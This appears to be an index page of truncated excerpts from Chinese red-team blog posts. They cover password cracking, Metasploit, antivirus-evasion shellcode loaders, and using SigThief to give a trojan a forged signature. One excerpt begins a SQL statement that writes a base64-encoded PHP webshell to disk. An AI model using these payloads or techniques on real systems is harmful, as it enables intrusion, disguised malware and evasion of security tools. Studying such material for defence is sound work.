前言 从老外那新学一招：https://www.youtube.com/watch?v=FQGu9jarCWY 开始 先说优点，系统自带不安装第三方应用，不用重启，和 strace 方法相比不会生成过大的文件，能自动清理自身不留痕迹，...

前言 1、做渗透由始至终，忌讳穿插其他项目进行 2、按顺序细心测试每一个功能点，保证漏洞无遗漏 3、山穷水复疑无路，柳暗花明又一村，一个点利用不到，可以灵活变通尝试其他方向 漏扫工具 AWVS...

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...

一、简介 在我们取得目标哈希或者遇到受密码保护的文件时，需要取得解密密码或明文密码，此时就可以使用hashcat、john来进行密码破解，以此取得我们想要的。 二、示例 2.1 使用格式 hashcat：ha...

红队技术 - 隐藏上传的程序木马 1、exe 伪装正常程序 https://github.com/secretsquirrel/SigThief python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe -i 为签名文件 -t 为需要伪造...

go shellcode 加载 bypass AV 在攻防实战中免杀技术尤为重要，站在巨人的肩膀上学习 go shellcode 免杀加载的方法 相关代码打包至 github https://github.com/Pizz33/GobypassAV-shellcode...

啓動 msfconsole 啓動PostgreSQL systemctl start postgresql 設定PostgreSQL開機自啟動 systemctl enable postgresql 退出關閉 exit 查看相关命令 輸入問號即可 ？ 進入irb腳本模式 irb 查找模...

EDU从邮箱绕过到系统通杀

此 Python 脚本专为教育目的而设计，演示了与受 Cloudflare 保护的网站交互的基本方法。请负责任地使用此脚本，并且仅在您拥有适当授权的网站上使用。 先决条件 在运行脚本之前，请确保已安装以...

登陆口 js 前端加密绕过 环境搭建 1、首先得安装 maven，具体方法百度 2、下载 https://github.com/c0ny1/jsEncrypter c0ny1 师傅写好的 burp 插件 运行 mvn package 进行编译，编译...